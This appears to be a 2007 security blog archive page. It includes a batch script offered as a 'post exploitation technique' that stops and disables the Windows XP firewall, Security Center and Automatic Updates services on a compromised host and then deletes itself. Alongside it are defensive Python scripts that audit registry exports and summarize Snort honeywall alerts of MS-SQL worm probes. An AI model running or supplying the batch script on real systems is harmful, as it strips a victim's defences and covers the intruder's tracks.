Friday, November 16, 2007

Argus, Afterglow and NSMWiki

This month's ISSA Journal has an interesting article by Russ McRee on NSM topics. The main topic is Argus, an excellent suite of tools for distributed collection of network flow data, with the output graphed using Afterglow. He also mentions NSMWiki, which is maintained for the Sguil project.

If you're not an ISSA member, you can read Russ' article here.

Friday, November 9, 2007

Post Exploitation Technique: Kill the Windows XP SP2 firewall

This registry hack assumes that you already possess a remote shell and need to kill the firewall remotely (to spawn remote shells on certain egress ports). To use it, save the code below into a batch file (e.g. down.bat) and run it on the remote computer.


@echo off
REM Stop the Security Center service and the Windows Firewall/ICS service (SharedAccess)
net stop "Security Center"
net stop SharedAccess
REM Write a .reg file to %Temp% that sets each service's Start value to 4 (Disabled)
> "%Temp%.\kill.reg" ECHO REGEDIT4
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
REM Import the file silently, then remove it and this batch file
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0

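From the defender's side, the lasting artifact of the batch file above is three service keys whose Start value has been set to 4 (Disabled). The following Python script is an added example, not part of the original post: it parses a .reg export of the Services hive and flags exactly those services. It assumes the export was produced on the machine with "reg export HKLM\SYSTEM\CurrentControlSet\Services services.reg" and decoded to text by the caller (reg.exe writes UTF-16); the sample text embedded below is constructed to match what the batch file writes.

```python
"""Audit a .reg export for security services set to Disabled (Start=4).

Added example, not part of the original post. Assumed workflow: export the
Services key with reg.exe, decode it (encoding='utf-16' for reg.exe output),
then call audit_services() on the text.
"""
import re

# Services the batch file above touches, keyed by lower-cased key name.
WATCHED = {
    "sharedaccess": "Windows Firewall / Internet Connection Sharing",
    "wscsvc": "Security Center",
    "wuauserv": "Automatic Updates",
}
START_NAMES = {0: "Boot", 1: "System", 2: "Automatic", 3: "Manual", 4: "Disabled"}

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"(.+?)"=dword:([0-9a-fA-F]{8})$')

# Constructed sample: the three keys the batch file writes, plus one
# unrelated service left at its normal Automatic start type.
SAMPLE_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dhcp]
"Start"=dword:00000002
"""


def parse_reg(text):
    """Return {key_path: {value_name: int}} for the dword values in a .reg file.

    Handles both the REGEDIT4 and 'Windows Registry Editor Version 5.00'
    headers, since neither line matches a key or a value pattern.
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = int(m.group(2), 16)
    return keys


def audit_services(text):
    """Return (service, control_set, description, start_name) for each watched
    service whose Start value is 4 (Disabled).

    The control set is reported because CurrentControlSet is only a link to
    one of the ControlSetNNN keys; a write to ControlSet001 takes effect only
    if that is the set the machine currently boots from.
    """
    findings = []
    for key, values in parse_reg(text).items():
        parts = key.split("\\")
        # Expected shape: HKEY_LOCAL_MACHINE\SYSTEM\<ControlSet>\Services\<name>
        if len(parts) < 5 or parts[3].lower() != "services":
            continue
        name = parts[4]
        if name.lower() in WATCHED and values.get("Start") == 4:
            findings.append((name, parts[2], WATCHED[name.lower()], START_NAMES[4]))
    return findings


if __name__ == "__main__":
    for service, control_set, description, start in audit_services(SAMPLE_REG):
        print(f"{service:14} {control_set:18} {description} -> {start}")
```

Run against a real export, the script only reports the watched services; extend WATCHED with any other service whose start type your baseline says should never be Disabled.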


May Your Skill Prevail.

Thursday, November 8, 2007

When Script Kiddies Attack!

Snort alerts from our resident Honeywall! Even though we are currently running MySQL as our flypaper, there are script kiddies running relentless MS-SQL attempts. This is raw data, but I thought it would be of nominal interest nonetheless.

[**] [1:2003:8] MS-SQL Worm propagation attempt [**]

[Classification: Misc Attack] [Priority: 2]

08/14-07:35:43.418518 10.10.10.254:2456 -> 10.1.4.3:1434

UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404

Len: 376

[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310]



[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]

[Classification: Misc Attack] [Priority: 2]

08/14-07:35:43.418518 10.10.10.254:2456 -> 10.1.4.3:1434

UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404

Len: 376

[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310]



[**] [1:2050:9] MS-SQL version overflow attempt [**]

[Classification: Misc activity] [Priority: 3]

08/14-07:35:43.418518 10.10.10.254:2456 -> 10.1.4.3:1434

UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404

Len: 376

[Xref => http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx][Xref
=> http://cgi.nessus.org/plugins/dump.php3?id=10674][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5310]



[**] [1:2003:8] MS-SQL Worm propagation attempt [**]

[Classification: Misc Attack] [Priority: 2]

08/14-15:28:04.702026 218.232.95.60:3664 -> 10.1.4.3:1434

UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404

Len: 376

[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310]



[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]

[Classification: Misc Attack] [Priority: 2]

08/14-15:28:04.702026 218.232.95.60:3664 -> 10.1.4.3:1434

UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404

Len: 376

[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310]



[**] [1:2050:9] MS-SQL version overflow attempt [**]

[Classification: Misc activity] [Priority: 3]

08/14-15:28:04.702026 218.232.95.60:3664 -> 10.1.4.3:1434

UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404

Len: 376

[Xref => http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx][Xref
=> http://cgi.nessus.org/plugins/dump.php3?id=10674][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5310]



[**] [1:2003:8] MS-SQL Worm propagation attempt [**]

[Classification: Misc Attack] [Priority: 2]

08/14-15:42:58.867441 202.106.102.195:1071 -> 10.1.4.3:1434

UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404

Len: 376

[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310]



[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]

[Classification: Misc Attack] [Priority: 2]

08/14-15:42:58.867441 202.106.102.195:1071 -> 10.1.4.3:1434

UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404

Len: 376

[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310]



[**] [1:2050:9] MS-SQL version overflow attempt [**]

[Classification: Misc activity] [Priority: 3]

08/14-15:42:58.867441 202.106.102.195:1071 -> 10.1.4.3:1434

UDP TTL:108 TOS:0x20 ID:24341 IpLen:20 DgmLen:404

Len: 376

[Xref => http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx][Xref
=> http://cgi.nessus.org/plugins/dump.php3?id=10674][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5310]



[**] [1:2003:8] MS-SQL Worm propagation attempt [**]

[Classification: Misc Attack] [Priority: 2]

08/14-19:15:19.388509 221.195.73.84:1042 -> 10.1.4.3:1434

UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404

Len: 376

[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310]



[**] [1:2004:7] MS-SQL Worm propagation attempt OUTBOUND [**]

[Classification: Misc Attack] [Priority: 2]

08/14-19:15:19.388509 221.195.73.84:1042 -> 10.1.4.3:1434

UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404

Len: 376

[Xref => http://vil.nai.com/vil/content/v_99992.htm][Xref =>
http://cgi.nessus.org/plugins/dump.php3?id=11214][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5311][Xref =>
http://www.securityfocus.com/bid/5310]



[**] [1:2050:9] MS-SQL version overflow attempt [**]

[Classification: Misc activity] [Priority: 3]

08/14-19:15:19.388509 221.195.73.84:1042 -> 10.1.4.3:1434

UDP TTL:109 TOS:0x20 ID:47455 IpLen:20 DgmLen:404

Len: 376

[Xref => http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx][Xref
=> http://cgi.nessus.org/plugins/dump.php3?id=10674][Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649][Xref =>
http://www.securityfocus.com/bid/5310]

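Each probe above fires three rules on the same packet (identical timestamp, IP ID and source port), so counting alert blocks overstates the number of probes threefold. The following Python script is an added example, not part of the original post: it parses Snort's full-format alert output as shown above, de-duplicates alerts that share a packet, and tallies probes per source host and per SID. The sample alerts embedded in it are constructed in the post's layout, with documentation-range source addresses rather than the real ones from the honeywall.

```python
"""Summarize Snort '-A full' alert output per source host and rule SID.

Added example, not part of the original post. The sample below is
constructed to match the post's layout; 192.0.2.10 and 198.51.100.7 are
documentation addresses, not real attackers.
"""
import re
from collections import Counter, defaultdict

SAMPLE_ALERTS = """\
[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-07:35:43.418518 192.0.2.10:2456 -> 10.1.4.3:1434
UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404
Len: 376
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649]

[**] [1:2050:9] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/14-07:35:43.418518 192.0.2.10:2456 -> 10.1.4.3:1434
UDP TTL:110 TOS:0x20 ID:24321 IpLen:20 DgmLen:404
Len: 376

[**] [1:2003:8] MS-SQL Worm propagation attempt [**]
[Classification: Misc Attack] [Priority: 2]
08/14-15:28:04.702026 198.51.100.7:3664 -> 10.1.4.3:1434
UDP TTL:108 TOS:0x20 ID:34162 IpLen:20 DgmLen:404
Len: 376
"""

HEADER_RE = re.compile(r"^\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]$")
CLASS_RE = re.compile(r"^\[Classification: (.+?)\] \[Priority: (\d+)\]$")
PACKET_RE = re.compile(
    r"^(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) "
    r"(\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)$"
)
PROTO_RE = re.compile(r"^(TCP|UDP|ICMP) TTL:(\d+) .*ID:(\d+) ")


def parse_alerts(text):
    """Return one dict per '[**] ... [**]' block; Xref and Len lines are ignored."""
    alerts, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HEADER_RE.match(line)
        if m:
            if current is not None:
                alerts.append(current)
            gid, sid, rev, msg = m.groups()
            current = {"gid": int(gid), "sid": int(sid), "rev": int(rev), "msg": msg}
            continue
        if current is None:
            continue  # text before the first header
        m = CLASS_RE.match(line)
        if m:
            current["classification"], current["priority"] = m.group(1), int(m.group(2))
            continue
        m = PACKET_RE.match(line)
        if m:
            ts, src, sport, dst, dport = m.groups()
            current.update(timestamp=ts, src=src, sport=int(sport), dst=dst, dport=int(dport))
            continue
        m = PROTO_RE.match(line)
        if m:
            current["proto"], current["ttl"], current["ipid"] = m.group(1), int(m.group(2)), int(m.group(3))
    if current is not None:
        alerts.append(current)
    return alerts


def summarize(alerts):
    """Per source host: distinct packets (keyed on timestamp, source port and
    IP ID, since several rules fire on one packet), total alerts, and SID counts."""
    packets, sids = defaultdict(set), defaultdict(Counter)
    for a in alerts:
        packets[a["src"]].add((a.get("timestamp"), a.get("sport"), a.get("ipid")))
        sids[a["src"]][a["sid"]] += 1
    return {
        src: {"packets": len(packets[src]), "alerts": sum(sids[src].values()), "sids": dict(sids[src])}
        for src in packets
    }


def slammer_sources(alerts):
    """Sorted source hosts that sent UDP to port 1434, the SQL Slammer signature."""
    return sorted({a["src"] for a in alerts if a.get("proto") == "UDP" and a.get("dport") == 1434})


if __name__ == "__main__":
    for src, info in summarize(parse_alerts(SAMPLE_ALERTS)).items():
        print(f"{src:16} packets={info['packets']} alerts={info['alerts']} sids={info['sids']}")
```

Feed it a real alert file and the packet count per source gives the number of probes, while the SID breakdown shows which rules each probe tripped; on the honeywall output above, every source tripped 2003, 2004 and 2050 together.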
Wednesday, November 7, 2007

BlackHat Vegas 2007 and Defcon 15 Photos

Yes, I know these events transpired ages ago. I wanted to post them here anyway in case anyone was interested in seeing why I will never have a future in photography!

View the photos here.

Home/Office Lab

One of the major undertakings of this recent summer was to rebuild the IGS Lab and Research environment.

From rat's nest to organization. Most of the equipment was moved off desks and tables onto a rack, along with the introduction of proper cable and wiring management. Additional power was also added to deal with random (and frustrating) power losses.

View the transformation.